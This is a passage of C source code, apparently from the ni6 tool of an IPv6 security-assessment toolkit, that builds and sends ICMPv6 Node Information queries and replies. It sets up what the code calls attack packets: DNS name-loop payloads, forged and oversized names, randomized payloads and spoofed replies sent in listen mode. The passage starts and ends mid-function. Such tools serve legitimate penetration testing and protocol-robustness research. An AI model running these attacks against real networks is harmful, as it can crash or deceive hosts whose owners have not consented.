filters.nblockdst++; break; case 'J': /* Link Source Address (block) filter */ if(filters.nblocklinksrc > MAX_BLOCK_LINK_SRC){ puts("Too many link-layer Source Address (accept) filters."); exit(EXIT_FAILURE); } if(ether_pton(optarg, &(filters.blocklinksrc[filters.nblocklinksrc]), sizeof(struct ether_addr)) == 0){ printf("Error in link-layer Source Address (blick) filter number %u.\n", \ filters.nblocklinksrc+1); exit(EXIT_FAILURE); } (filters.nblocklinksrc)++; break; case 'K': /* Link Destination Address (block) filter */ if(filters.nblocklinkdst > MAX_BLOCK_LINK_DST){ puts("Too many link-layer Destination Address (block) filters."); exit(EXIT_FAILURE); } if(ether_pton(optarg, &(filters.blocklinkdst[filters.nblocklinkdst]), sizeof(struct ether_addr)) == 0){ printf("Error in link-layer Destination Address (blick) filter number %u.\n", \ filters.nblocklinkdst+1); exit(EXIT_FAILURE); } filters.nblocklinkdst++; break; case 'b': /* IPv6 Source Address (accept) filter */ if(filters.nacceptsrc > MAX_ACCEPT_SRC){ puts("Too many IPv6 Source Address (accept) filters."); exit(EXIT_FAILURE); } if((pref = strtok_r(optarg, "/", &lasts)) == NULL){ printf("Error in IPv6 Source Address (accept) filter number %u.\n", \ filters.nacceptsrc+1); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, pref, &(filters.acceptsrc[filters.nacceptsrc])) <= 0){ printf("Error in IPv6 Source Address (accept) filter number %u.\n", \ filters.nacceptsrc+1); exit(EXIT_FAILURE); } if((charptr = strtok_r(NULL, " ", &lasts)) == NULL){ filters.acceptsrclen[filters.nacceptsrc] = 128; } else{ filters.acceptsrclen[filters.nacceptsrc] = atoi(charptr); if(filters.acceptsrclen[filters.nacceptsrc]>128){ printf("Length error in IPv6 Source Address (accept) filter number %u.\n", \ filters.nacceptsrc+1); exit(EXIT_FAILURE); } } sanitize_ipv6_prefix(&(filters.acceptsrc[filters.nacceptsrc]), filters.acceptsrclen[filters.nacceptsrc]); (filters.nacceptsrc)++; filters.acceptfilters_f=1; break; case 'g': /* IPv6 Destination Address (accept) filter */ if(filters.nacceptdst > MAX_ACCEPT_DST){ puts("Too many IPv6 Destination Address (accept) filters."); exit(EXIT_FAILURE); } if((pref = strtok_r(optarg, "/", &lasts)) == NULL){ printf("Error in IPv6 Destination Address (accept) filter number %u.\n", \ filters.nacceptdst+1); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, pref, &(filters.acceptdst[filters.nacceptdst])) <= 0){ printf("Error in IPv6 Source Address (accept) filter number %u.\n", \ filters.nacceptdst+1); exit(EXIT_FAILURE); } if((charptr = strtok_r(NULL, " ", &lasts)) == NULL){ filters.acceptdstlen[filters.nacceptdst] = 128; } else{ filters.acceptdstlen[filters.nacceptdst] = atoi(charptr); if(filters.acceptdstlen[filters.nacceptdst] > 128){ printf("Length error in IPv6 Source Address (accept) filter number %u.\n", \ filters.nacceptdst+1); exit(EXIT_FAILURE); } } sanitize_ipv6_prefix(&(filters.acceptdst[filters.nacceptdst]), filters.acceptdstlen[filters.nacceptdst]); (filters.nacceptdst)++; filters.acceptfilters_f=1; break; case 'B': /* Link-layer Source Address (accept) filter */ if(filters.nacceptlinksrc > MAX_ACCEPT_LINK_SRC){ puts("Too many link-later Source Address (accept) filters."); exit(EXIT_FAILURE); } if(ether_pton(optarg, &(filters.acceptlinksrc[filters.nacceptlinksrc]), sizeof(struct ether_addr)) == 0){ printf("Error in link-layer Source Address (accept) filter number %u.\n", \ filters.nacceptlinksrc+1); exit(EXIT_FAILURE); } (filters.nacceptlinksrc)++; filters.acceptfilters_f=1; break; case 'G': /* Link Destination Address (accept) filter */ if(filters.nacceptlinkdst > MAX_ACCEPT_LINK_DST){ puts("Too many link-layer Destination Address (accept) filters."); exit(EXIT_FAILURE); } if(ether_pton(optarg, &(filters.acceptlinkdst[filters.nacceptlinkdst]), sizeof(struct ether_addr)) == 0){ printf("Error in link-layer Destination Address (accept) filter number %u.\n",\ filters.nacceptlinkdst+1); exit(EXIT_FAILURE); } (filters.nacceptlinkdst)++; filters.acceptfilters_f=1; break; case 'r': rand_src_f=1; break; case 'R': forgeether_f=1; break; case 'l': /* "Loop mode */ loop_f = 1; break; case 'z': /* Sleep option */ nsleep=atoi(optarg); if(nsleep==0){ puts("Invalid number of seconds in '-z' option"); exit(EXIT_FAILURE); } sleep_f=1; break; case 'L': /* "Listen mode */ listen_f = 1; break; case 'v': /* Be verbose */ idata.verbose_f++; break; case 'h': /* Help */ print_help(); exit(EXIT_FAILURE); break; default: usage(); exit(EXIT_FAILURE); break; } /* switch */ } /* while(getopt) */ if(geteuid()) { puts("ni6 needs root privileges to run."); exit(EXIT_FAILURE); } if(!iface_f){ puts("Must specify the network interface with the -i option"); exit(EXIT_FAILURE); } if(listen_f && loop_f){ puts("'Error: 'listen' mode and 'loop' mode are incompatible"); exit(EXIT_FAILURE); } if(!(idata.dstaddr_f) && !listen_f){ /* Must specify IPv6 Destination Address if listening mode not used */ puts("IPv6 Destination Address not specified (and listening mode not selected)"); exit(EXIT_FAILURE); } if(load_dst_and_pcap(&idata, LOAD_SRC_NXT_HOP) == FAILURE){ puts("Error while learning Souce Address and Next Hop"); exit(EXIT_FAILURE); } release_privileges(); if(!sleep_f) nsleep=2; if(!maxlabel_f){ maxlabel=63; } if(!flags_f){ switch(qtype){ case NI_QTYPE_NODEADDR: flags= NI_NODEADDR_FLAG_GLOBAL | NI_NODEADDR_FLAG_SITELOCAL | NI_NODEADDR_FLAG_LINKLOCAL |\ NI_NODEADDR_FLAG_COMPAT | NI_NODEADDR_FLAG_ALL; break; default: flags= 0; break; } } if( !fragh_f && dstoptuhdr_f){ puts("Dst. Options Header (Unfragmentable Part) set, but Fragmentation not specified"); exit(EXIT_FAILURE); } if(fragh_f) idata.max_packet_size = MAX_IPV6_PAYLOAD + MIN_IPV6_HLEN; else idata.max_packet_size = ETH_DATA_LEN; if(sloopattack_f){ if(code_f && code != 1){ puts("Error: NI code must be '1' for performing name-loop attacks"); exit(EXIT_FAILURE); } else{ code=1; } } if(sloopattack_f){ switch(slvariant){ case 0: slpointer= (unsigned char *)dnsloopq0; slsize= sizeof(dnsloopq0); break; case 1: slpointer= (unsigned char *)dnsloopq1; slsize= sizeof(dnsloopq1); break; default: puts("Error: invalid name loop variant (valid values are 0-1)"); exit(EXIT_FAILURE); break; } } if(dloopattack_f){ switch(dlvariant){ case 0: dlpointer= (unsigned char *)dnsloopr0; dlsize= sizeof(dnsloopr0); break; case 1: dlpointer= (unsigned char *)dnsloopr1; dlsize= sizeof(dnsloopr1); break; case 2: dlpointer= (unsigned char *)dnsloopr2; dlsize= sizeof(dnsloopr2); break; default: puts("Error: invalid name loop variant (valid values are 0-2)"); exit(EXIT_FAILURE); break; } } /* Set initial contents of the attack packet */ init_packet_data(&idata); if( (idata.fd= pcap_fileno(idata.pfd)) == -1){ puts("Error obtaining descriptor number for pcap_t"); exit(EXIT_FAILURE); } FD_ZERO(&sset); FD_SET(idata.fd, &sset); start= time(NULL); /* Fire an ICMPv6 Redirect if an IPv6 Destination Address was specified */ if(idata.dstaddr_f){ if(!code_f){ if(ipv6addr_f){ code=0; } else if(name_f || fname_f || exceedp_f || sloopattack_f){ code=1; } else if(ipv4addr_f){ code=2; } else{ code=0; } } if(!qtype_f){ switch(code){ case 0: qtype= NI_QTYPE_NODEADDR; break; case 1: qtype= NI_QTYPE_NODEADDR; break; case 2: qtype= NI_QTYPE_NODEADDR; break; default: qtype= NI_QTYPE_NOOP; break; } } if(pcap_compile(idata.pfd, &pcap_filter, PCAP_ICMPV6_NI_REPLY, PCAP_OPT, PCAP_NETMASK_UNKNOWN) == -1){ printf("pcap_compile(): %s", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } if(pcap_setfilter(idata.pfd, &pcap_filter) == -1){ printf("pcap_setfilter(): %s", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } pcap_freecode(&pcap_filter); type= ICMP6_NI_QUERY; if(idata.verbose_f){ print_attack_info(&idata); } while(1){ curtime=time(NULL); if(!loop_f && (curtime - start) >= QUERY_TIMEOUT){ break; } if((curtime - lastni) >= nsleep){ lastni=curtime; puts("Sending ICMPv6 Node Information Query....\n"); if(send_packet(&idata, NULL, NULL) == -1){ puts("Error sending packet"); exit(EXIT_FAILURE); } } rset= sset; timeout.tv_usec=0; timeout.tv_sec= nsleep; if((sel=select(idata.fd+1, &rset, NULL, NULL, &timeout)) == -1){ if(errno == EINTR){ continue; } else{ puts("Error in select()"); exit(EXIT_FAILURE); } } /* Read a NI Reply packet */ if(FD_ISSET(idata.fd, &rset)){ if((r=pcap_next_ex(idata.pfd, &pkthdr, &pktdata)) == -1){ printf("pcap_next_ex(): %s", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } else if(r == 0){ continue; /* Should never happen */ } if(print_ni_data(&idata, pktdata, pkthdr) == -1){ puts("Error while printing NI data"); exit(EXIT_FAILURE); } } } exit(EXIT_SUCCESS); } if(listen_f){ if(named_f || fnamed_f || exceedpd_f || dloopattack_f){ qtype= NI_QTYPE_DNSNAME; } else if(ipv4addrd_f){ qtype= NI_QTYPE_IPV4ADDR; } else if(ipv6addrd_f){ qtype= NI_QTYPE_NODEADDR; } else if(!qtype_f){ qtype= NI_QTYPE_NOOP; } if(pcap_compile(idata.pfd, &pcap_filter, PCAP_ICMPV6_NI_QUERY, PCAP_OPT, PCAP_NETMASK_UNKNOWN) == -1){ printf("pcap_compile(): %s", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } if(pcap_setfilter(idata.pfd, &pcap_filter) == -1){ printf("pcap_setfilter(): %s", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } pcap_freecode(&pcap_filter); type= ICMP6_NI_REPLY; if(idata.verbose_f){ print_attack_info(&idata); } if(idata.verbose_f){ print_filters(&idata, &filters); puts("Listening to incoming IPv6 packets..."); } while(listen_f){ rset= sset; if((sel=select(idata.fd+1, &rset, NULL, NULL, NULL)) == -1){ if(errno == EINTR){ continue; } else{ puts("Error in select()"); exit(EXIT_FAILURE); } } /* Read a Neighbor Solicitation message */ if((r=pcap_next_ex(idata.pfd, &pkthdr, &pktdata)) == -1){ printf("pcap_next_ex(): %s", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } else if(r == 0){ continue; /* Should never happen */ } pkt_ether = (struct ether_header *) pktdata; pkt_ipv6 = (struct ip6_hdr *)((char *) pkt_ether + idata.linkhsize); pkt_ni= (struct icmp6_nodeinfo *) ( (unsigned char *) pkt_ipv6 + sizeof(struct ip6_hdr)); accepted_f=0; if(pkt_ni->ni_type != ICMP6_NI_QUERY){ continue; } if(pkt_ni->ni_qtype != htons(qtype)){ continue; } if(!rand_src_f){ if(!IN6_IS_ADDR_MC_LINKLOCAL(&(pkt_ipv6->ip6_dst)) && \ !is_ip6_in_address_list(&(idata.ip6_global), &(pkt_ipv6->ip6_dst)) && \ !is_eq_in6_addr(&(pkt_ipv6->ip6_dst), &(idata.ip6_local))) continue; } if(filters.nblocklinksrc){ if(match_ether(filters.blocklinksrc, filters.nblocklinksrc, &(pkt_ether->src))){ if(idata.verbose_f > 1) print_filter_result(&idata, pktdata, BLOCKED); continue; } } if(filters.nblocklinkdst){ if(match_ether(filters.blocklinkdst, filters.nblocklinkdst, &(pkt_ether->dst))){ if(idata.verbose_f > 1) print_filter_result(&idata, pktdata, BLOCKED); continue; } } if(filters.nblocksrc){ if(match_ipv6(filters.blocksrc, filters.blocksrclen, filters.nblocksrc, &(pkt_ipv6->ip6_src))){ if(idata.verbose_f > 1) print_filter_result(&idata, pktdata, BLOCKED); continue; } } if(filters.nblockdst){ if(match_ipv6(filters.blockdst, filters.blockdstlen, filters.nblockdst, &(pkt_ipv6->ip6_dst))){ if(idata.verbose_f > 1) print_filter_result(&idata, pktdata, BLOCKED); continue; } } if(filters.nacceptlinksrc){ if(match_ether(filters.acceptlinksrc, filters.nacceptlinksrc, &(pkt_ether->src))) accepted_f=1; } if(filters.nacceptlinkdst && !accepted_f){ if(match_ether(filters.acceptlinkdst, filters.nacceptlinkdst, &(pkt_ether->dst))) accepted_f= 1; } if(filters.nacceptsrc && !accepted_f){ if(match_ipv6(filters.acceptsrc, filters.acceptsrclen, filters.nacceptsrc, &(pkt_ipv6->ip6_src))) accepted_f= 1; } if(filters.nacceptdst && !accepted_f){ if(match_ipv6(filters.acceptdst, filters.acceptdstlen, filters.nacceptdst, &(pkt_ipv6->ip6_dst))) accepted_f=1; } if(filters.acceptfilters_f && !accepted_f){ if(idata.verbose_f > 1) print_filter_result(&idata, pktdata, BLOCKED); continue; } if(idata.verbose_f) print_filter_result(&idata, pktdata, ACCEPTED); /* Send a Neighbor Advertisement */ send_packet(&idata, pktdata, pkthdr); } exit(EXIT_SUCCESS); } if(!idata.dstaddr_f && !listen_f){ puts("Error: Nothing to send! (key parameters left unspecified, and not using listening mode)"); exit(EXIT_FAILURE); } exit(EXIT_SUCCESS); } /* * Function: print_ni_data() * * Wrapper to call the different functions that print the contents of NI replies */ int print_ni_data(struct iface_data *idata, const u_char *pktdata, struct pcap_pkthdr * pkthdr){ struct icmp6_nodeinfo *pkt_ni; pkt_ni= (struct icmp6_nodeinfo *) ((char *)pktdata + idata->linkhsize + sizeof(struct ip6_hdr)); switch(ntohs(pkt_ni->ni_qtype)){ case NI_QTYPE_NOOP: if(print_ni_noop(idata, pktdata, pkthdr) == -1){ return(-1); } break; case NI_QTYPE_SUPTYPES: if(print_ni_noop(idata, pktdata, pkthdr) == -1){ return(-1); } break; case NI_QTYPE_DNSNAME: if(print_ni_name(idata, pktdata, pkthdr) == -1){ return(-1); } break; case NI_QTYPE_NODEADDR: if(print_ni_addr6(idata, pktdata, pkthdr) == -1){ return(-1); } break; case NI_QTYPE_IPV4ADDR: if(print_ni_addr6(idata, pktdata, pkthdr) == -1){ return(-1); } break; default: break; } return(0); } /* * Function: print_ni_addr() * * Print responses to ICMPv6 NI queries for IPv4 addresses */ int print_ni_addr(struct iface_data *idata, const u_char *pktdata, struct pcap_pkthdr * pkthdr){ struct ether_header *pkt_ether; struct ip6_hdr *pkt_ipv6; struct icmp6_nodeinfo *pkt_ni; unsigned char *pkt_end; u_int16_t flags; struct ni_reply_ip *pkt_nidata; pkt_ether = (struct ether_header *) pktdata; pkt_ipv6 = (struct ip6_hdr *)((char *) pkt_ether + idata->linkhsize); pkt_ni= (struct icmp6_nodeinfo *) ((char *) pkt_ipv6 + sizeof(struct ip6_hdr)); pkt_end = (unsigned char *) pktdata + pkthdr->caplen; if( pkt_end > ((unsigned char *)pkt_ni + pkt_ipv6->ip6_plen) ) pkt_end = (unsigned char *)pkt_ni + pkt_ipv6->ip6_plen; if(!is_eq_in6_addr(&(pkt_ipv6->ip6_dst), &(idata->srcaddr))) return 0; if(inet_ntop(AF_INET6, &(pkt_ipv6->ip6_src), pv6addr, sizeof(pv6addr)) == NULL){ if(idata->verbose_f) puts("inet_ntop(): Error converting IPv6 Source Address to presentation format"); return(-1); } printf("Response from: %s\n", pv6addr); switch(pkt_ni->ni_code){ case 0: printf("\tCode: 0 (Successful reply)"); break; case 1: printf("\tCode: 1 (Node refuses to supply the answer)"); break; case 2: printf("\tCode: 2 (Qtype unknown to the responder)"); break; default: printf("\tCode: %u (Qtype unknown)", pkt_ni->ni_code); break; } flags= ntohs(pkt_ni->ni_flags); printf("\tFlags: %s%s%s%s%s%s%s\n", ((flags & NI_NODEADDR_FLAG_GLOBAL)?"G":""), \ ((flags & NI_NODEADDR_FLAG_SITELOCAL)?"S":""), \ ((flags & NI_NODEADDR_FLAG_LINKLOCAL)?"L":""), \ ((flags & NI_NODEADDR_FLAG_COMPAT)?"C":""),\ ((flags & NI_NODEADDR_FLAG_ALL)?"A":""), \ ((flags & NI_NODEADDR_FLAG_TRUNCATE)?"T":""),\ ((!flags)?"none":"")); pkt_nidata= (struct ni_reply_ip *) ((char *)pkt_ni + sizeof(struct icmp6_nodeinfo)); while( (pkt_end - (unsigned char *) pkt_nidata) >= sizeof(struct ni_reply_ip)){ if(inet_ntop(AF_INET, &(pkt_nidata->ip), pv6addr, sizeof(pv6addr)) == NULL){ if(idata->verbose_f) puts("inet_ntop(): Error converting IPv4 Address to presentation format"); return(-1); } printf("\t%s (TTL: %lu%s)\n", pv6addr, (LUI) pkt_nidata->ni_ip_ttl,\ (pkt_nidata->ni_ip_ttl==0xffffffff)?" (infinity)":""); pkt_nidata++; } if( (unsigned char *)pkt_nidata != pkt_end){ puts("Incomplete data in received NI Reply\n"); } else{ puts(""); } return(0); } /* * Function: print_ni_noop() * * Print responses to NOOP ICMPv6 NI queries */ int print_ni_noop(struct iface_data *idata, const u_char *pktdata, struct pcap_pkthdr * pkthdr){ struct ether_header *pkt_ether; struct ip6_hdr *pkt_ipv6; struct icmp6_nodeinfo *pkt_ni; unsigned char *pkt_end; pkt_ether = (struct ether_header *) pktdata; pkt_ipv6 = (struct ip6_hdr *)((char *) pkt_ether + idata->linkhsize); pkt_ni= (struct icmp6_nodeinfo *) ((char *) pkt_ipv6 + sizeof(struct ip6_hdr)); pkt_end = (unsigned char *) pktdata + pkthdr->caplen; if( pkt_end > ((unsigned char *)pkt_ni + pkt_ipv6->ip6_plen) ) pkt_end = (unsigned char *)pkt_ni + pkt_ipv6->ip6_plen; if(!is_eq_in6_addr(&(pkt_ipv6->ip6_dst), &(idata->srcaddr))) return 0; if(inet_ntop(AF_INET6, &(pkt_ipv6->ip6_src), pv6addr, sizeof(pv6addr)) == NULL){ if(idata->verbose_f) puts("inet_ntop(): Error converting IPv6 Source Address to presentation format"); return(-1); } printf("Response from: %s\n", pv6addr); switch(pkt_ni->ni_code){ case 0: puts("\tCode: 0 (Successful reply)\n"); break; case 1: puts("\tCode: 1 (Node refuses to supply the answer)\n"); break; case 2: puts("\tCode: 2 (Qtype unknown to the responder)\n"); break; default: printf("\tCode: %u (Qtype unknown)\n\n", pkt_ni->ni_code); break; } return(0); } /* * Function: print_ni_addr6() * * Print responses to ICMPv6 NI queries for IPv6 addresses */ int print_ni_addr6(struct iface_data *idata, const u_char *pktdata, struct pcap_pkthdr * pkthdr){ struct ether_header *pkt_ether; struct ip6_hdr *pkt_ipv6; struct icmp6_nodeinfo *pkt_ni; unsigned char *pkt_end; u_int16_t flags; struct ni_reply_ip6 *pkt_nidata; pkt_ether = (struct ether_header *) pktdata; pkt_ipv6 = (struct ip6_hdr *)((char *) pkt_ether + idata->linkhsize); pkt_ni= (struct icmp6_nodeinfo *) ((char *) pkt_ipv6 + sizeof(struct ip6_hdr)); pkt_end = (unsigned char *) pktdata + pkthdr->caplen; if( pkt_end > ((unsigned char *)pkt_ni + pkt_ipv6->ip6_plen) ) pkt_end = (unsigned char *)pkt_ni + pkt_ipv6->ip6_plen; if(!is_eq_in6_addr(&(pkt_ipv6->ip6_dst), &(idata->srcaddr))) return 0; if(inet_ntop(AF_INET6, &(pkt_ipv6->ip6_src), pv6addr, sizeof(pv6addr)) == NULL){ if(idata->verbose_f) puts("inet_ntop(): Error converting IPv6 Address to presentation format"); return(-1); } printf("Response from: %s\n", pv6addr); switch(pkt_ni->ni_code){ case 0: printf("\tCode: 0 (Successful reply)"); break; case 1: printf("\tCode: 1 (Node refuses to supply the answer)"); break; case 2: printf("\tCode: 2 (Qtype unknown to the responder)"); break; default: printf("\tCode: %u (Qtype unknown)", pkt_ni->ni_code); break; } flags= ntohs(pkt_ni->ni_flags); printf("\tFlags: %s%s%s%s%s%s%s\n", ((flags & NI_NODEADDR_FLAG_GLOBAL)?"G":""), \ ((flags & NI_NODEADDR_FLAG_SITELOCAL)?"S":""), \ ((flags & NI_NODEADDR_FLAG_LINKLOCAL)?"L":""), \ ((flags & NI_NODEADDR_FLAG_COMPAT)?"C":""),\ ((flags & NI_NODEADDR_FLAG_ALL)?"A":""), \ ((flags & NI_NODEADDR_FLAG_TRUNCATE)?"T":""),\ ((!flags)?"none":"")); pkt_nidata= (struct ni_reply_ip6 *) ((char *)pkt_ni + sizeof(struct icmp6_nodeinfo)); while( (pkt_end - (unsigned char *) pkt_nidata) >= sizeof(struct ni_reply_ip6)){ if(inet_ntop(AF_INET6, &(pkt_nidata->ip6), pv6addr, sizeof(pv6addr)) == NULL){ if(idata->verbose_f) puts("inet_ntop(): Error converting IPv6 Source Address to presentation format"); return(-1); } printf("\t%s (TTL: %lu%s)\n", pv6addr, (LUI) pkt_nidata->ni_ip6_ttl,\ (pkt_nidata->ni_ip6_ttl==0xffffffff)?" (infinity)":""); pkt_nidata++; } if( (unsigned char *)pkt_nidata != pkt_end){ puts("Incomplete data in received NI Reply\n"); } else{ puts(""); } return(0); } /* * Function: print_ni_name() * * Print responses to ICMPv6 NI queries for names */ int print_ni_name(struct iface_data *idata, const u_char *pktdata, struct pcap_pkthdr * pkthdr){ struct ether_header *pkt_ether; struct ip6_hdr *pkt_ipv6; struct icmp6_nodeinfo *pkt_ni; unsigned char *pkt_end; struct ni_reply_name *pkt_nidata; unsigned char *start, *next; pkt_ether = (struct ether_header *) pktdata; pkt_ipv6 = (struct ip6_hdr *)((char *) pkt_ether + idata->linkhsize); pkt_ni= (struct icmp6_nodeinfo *) ((char *) pkt_ipv6 + sizeof(struct ip6_hdr)); pkt_end = (unsigned char *) pktdata + pkthdr->caplen; if( pkt_end > ((unsigned char *)pkt_ni + pkt_ipv6->ip6_plen) ) pkt_end = (unsigned char *)pkt_ni + pkt_ipv6->ip6_plen; if(!is_eq_in6_addr(&(pkt_ipv6->ip6_dst), &(idata->srcaddr))) return 0; if(inet_ntop(AF_INET6, &(pkt_ipv6->ip6_src), pv6addr, sizeof(pv6addr)) == NULL){ if(idata->verbose_f) puts("inet_ntop(): Error converting IPv6 Address to presentation format"); return(-1); } printf("Response from: %s\n", pv6addr); switch(pkt_ni->ni_code){ case 0: puts("\tCode: 0 (Successful reply)"); break; case 1: puts("\tCode: 1 (Node refuses to supply the answer)"); break; case 2: puts("\tCode: 2 (Qtype unknown to the responder)"); break; default: printf("\tCode: %u (Qtype unknown)\n", pkt_ni->ni_code); break; } pkt_nidata= (struct ni_reply_name *) ((char *)pkt_ni + sizeof(struct icmp6_nodeinfo)); start= (unsigned char *) pkt_nidata; next= (unsigned char *) &(pkt_nidata->ni_name_name); while(next != NULL && dns_decode(start, pkt_end-start, next, domain, sizeof(domain), &next) == 0){ printf("\t%s (TTL: %lu%s)\n", domain, (LUI) pkt_nidata->ni_name_ttl,\ (pkt_nidata->ni_name_ttl==0xffffffff)?" (infinity)":""); } puts(""); return(0); } /* * Function: init_packet_data() * * Initialize the contents of the attack packet (Ethernet header, IPv6 Header, and ICMPv6 header) * that are expected to remain constant for the specified attack. */ void init_packet_data(struct iface_data *idata){ struct dlt_null *dlt_null; ethernet= (struct ether_header *) buffer; dlt_null= (struct dlt_null *) buffer; v6buffer = buffer + idata->linkhsize; ipv6 = (struct ip6_hdr *) v6buffer; if(idata->type == DLT_EN10MB && idata->type != IFACE_LOOPBACK){ ethernet->src = idata->hsrcaddr; ethernet->dst = idata->hdstaddr; ethernet->ether_type = htons(ETHERTYPE_IPV6); } else if(idata->type == DLT_NULL){ dlt_null->family= PF_INET6; } ipv6->ip6_flow=0; ipv6->ip6_vfc= 0x60; ipv6->ip6_hlim= hoplimit; ipv6->ip6_src= idata->srcaddr; ipv6->ip6_dst= idata->dstaddr; prev_nh = (unsigned char *) &(ipv6->ip6_nxt); ptr = (unsigned char *) v6buffer + MIN_IPV6_HLEN; if(hbhopthdr_f){ hbhopthdrs=0; while(hbhopthdrs < nhbhopthdr){ if((ptr+ hbhopthdrlen[hbhopthdrs]) > (v6buffer+ ETH_DATA_LEN)){ puts("Packet too large while processing HBH Opt. Header"); exit(EXIT_FAILURE); } *prev_nh = IPPROTO_HOPOPTS; prev_nh = ptr; memcpy(ptr, hbhopthdr[hbhopthdrs], hbhopthdrlen[hbhopthdrs]); ptr = ptr + hbhopthdrlen[hbhopthdrs]; hbhopthdrs++; } } if(dstoptuhdr_f){ dstoptuhdrs=0; while(dstoptuhdrs < ndstoptuhdr){ if((ptr+ dstoptuhdrlen[dstoptuhdrs]) > (v6buffer+ ETH_DATA_LEN)){ puts("Packet too large while processing Dest. Opt. Header (Unfrag. Part)"); exit(EXIT_FAILURE); } *prev_nh = IPPROTO_DSTOPTS; prev_nh = ptr; memcpy(ptr, dstoptuhdr[dstoptuhdrs], dstoptuhdrlen[dstoptuhdrs]); ptr = ptr + dstoptuhdrlen[dstoptuhdrs]; dstoptuhdrs++; } } /* Everything that follows is the Fragmentable Part of the packet */ fragpart = ptr; if(fragh_f){ /* Check that we are able to send the Unfragmentable Part, together with a Fragment Header and a chunk data over our link layer */ if( (fragpart+sizeof(fraghdr)+nfrags) > (v6buffer+ETH_DATA_LEN)){ puts("Unfragmentable part too large for current MTU (1500 bytes)"); exit(EXIT_FAILURE); } /* We prepare a separate Fragment Header, but we do not include it in the packet to be sent. This Fragment Header will be used (an assembled with the rest of the packet by the send_packet() function. */ bzero(&fraghdr, FRAG_HDR_SIZE); *prev_nh = IPPROTO_FRAGMENT; prev_nh = (unsigned char *) &fraghdr; } if(dstopthdr_f){ dstopthdrs=0; while(dstopthdrs < ndstopthdr){ if((ptr+ dstopthdrlen[dstopthdrs]) > (v6buffer+ idata->max_packet_size)){ puts("Packet too large while processing Dest. Opt. Header (should be using the Frag. option?)"); exit(EXIT_FAILURE); } *prev_nh = IPPROTO_DSTOPTS; prev_nh = ptr; memcpy(ptr, dstopthdr[dstopthdrs], dstopthdrlen[dstopthdrs]); ptr = ptr + dstopthdrlen[dstopthdrs]; dstopthdrs++; } } *prev_nh = IPPROTO_ICMPV6; startofprefixes=ptr; } /* * Function: send_packet() * * Initialize the remaining fields of the Neighbor Advertisement Message, and * send the attack packet(s). */ int send_packet(struct iface_data *idata, const u_char *pktdata, struct pcap_pkthdr * pkthdr){ ptr=startofprefixes; if(pktdata != NULL){ /* Sending a NI Reply in response to a received query */ pkt_ether = (struct ether_header *) pktdata; pkt_ipv6 = (struct ip6_hdr *)((char *) pkt_ether + idata->linkhsize); pkt_ni= (struct icmp6_nodeinfo *) ( (unsigned char *)pkt_ipv6 + sizeof (struct ip6_hdr)); /* If the IPv6 Source Address of the incoming Neighbor Solicitation is the unspecified address (::), the Neighbor Advertisement must be directed to the IPv6 all-nodes multicast address (and the Ethernet Destination address should be 33:33:33:00:00:01). Otherwise, the Neighbor Advertisement is sent to the IPv6 Source Address (and Ethernet Source Address) of the incoming Neighbor Solicitation message */ pkt_ipv6addr = &(pkt_ipv6->ip6_src); /* We don't send any packets if the Source Address of the captured packet is the unspecified address. */ if(IN6_IS_ADDR_UNSPECIFIED(pkt_ipv6addr)){ return 0; } else{ ipv6->ip6_dst = pkt_ipv6->ip6_src; ethernet->dst = pkt_ether->src; } pkt_ipv6addr = &(pkt_ipv6->ip6_dst); /* If the query was sent to a multicast address, we respond with a forged link-local address. Otherwise we respond to the unicast address that elicited our response XXX: [fgont] Changed */ if(IN6_IS_ADDR_MULTICAST(pkt_ipv6addr)){ ipv6->ip6_src= idata->srcaddr; ethernet->src= idata->hsrcaddr; } else{ ipv6->ip6_src= pkt_ipv6->ip6_dst; ethernet->src= pkt_ether->dst; } ni= (struct icmp6_nodeinfo *) ptr; ni->ni_type= ICMP6_NI_REPLY; ni->ni_code= 0; ni->ni_qtype= pkt_ni->ni_qtype; ni->ni_flags= pkt_ni->ni_flags; for(i=0; i<8; i++) ni->icmp6_ni_nonce[i]= pkt_ni->icmp6_ni_nonce[i]; ptr= ptr + sizeof(struct icmp6_nodeinfo); switch(ntohs(pkt_ni->ni_qtype)){ case NI_QTYPE_NOOP: break; case NI_QTYPE_SUPTYPES: break; case NI_QTYPE_DNSNAME: if(dloopattack_f){ if((ptr+(dlsize+4)) > (v6buffer + idata->max_packet_size)){ if(idata->verbose_f) puts("Packet too large while inserting name payload"); return(-1); } bzero(ptr, 4); ptr+=4; bcopy(dlpointer, ptr, dlsize); ptr+= dlsize; } else if(named_f){ if((ptr+ (namedlen+4)) > (v6buffer + idata->max_packet_size)){ if(idata->verbose_f) puts("Packet too large while inserting name"); return(-1); } /* The response contains a TTL, and it is set to 0 */ bzero(ptr, 4); ptr+= 4; bcopy(named, ptr, namedlen); ptr+= namedlen; if(snamedslabel_f){ if((ptr+1) > (v6buffer + idata->max_packet_size)){ if(idata->verbose_f) puts("Error while inserting last label"); return(-1); } else{ *ptr=0; ptr++; } } } else if(fnamed_f && fnamedlen>0){ if((ptr+ (fnamedlen+4)) > (v6buffer + idata->max_packet_size)){ if(idata->verbose_f) puts("Packet too large when inserting forged name"); return(-1); } /* The response contains a TTL, and it is set to 0 */ bzero(ptr, 4); ptr+= 4; i=fnamedlen-1; /* There is a zero-length label at the end */ if(snamedslabel_f && i>0) i=i-1; while(i>0){ if(i<= (maxlabel+1)){ /* This accounts for the length byte */ i=i-1; *ptr=i; ptr++; for(j=0; j1){ if((ptr+1) > (v6buffer + idata->max_packet_size)){ return(-1); } else{ *ptr=0; ptr++; } } } else if(exceedpd_f){ if( (ptr+5) > (v6buffer + idata->max_packet_size)){ if(idata->verbose_f) puts("Packet too large whil inserting 'exceeding' name"); return(-1); } /* The response contains a TTL, and it is set to 0 */ bzero(ptr, 4); ptr+= 4; *ptr= exceedpd; ptr++; } else if(payloadsize_f){ if(payloadsize>=4) payloadsize-=4; if((ptr+(payloadsize+4)) > (v6buffer + idata->max_packet_size)){ if(idata->verbose_f) puts("Packet too large while inserting randomized payload"); return(-1); } /* The response contains a TTL, and it is set to 0 */ bzero(ptr, 4); ptr+= 4; for(i=0; i (v6buffer + idata->max_packet_size)){ if(idata->verbose_f) puts("Packet too large when inserting IPv6 address"); return(-1); } *(struct 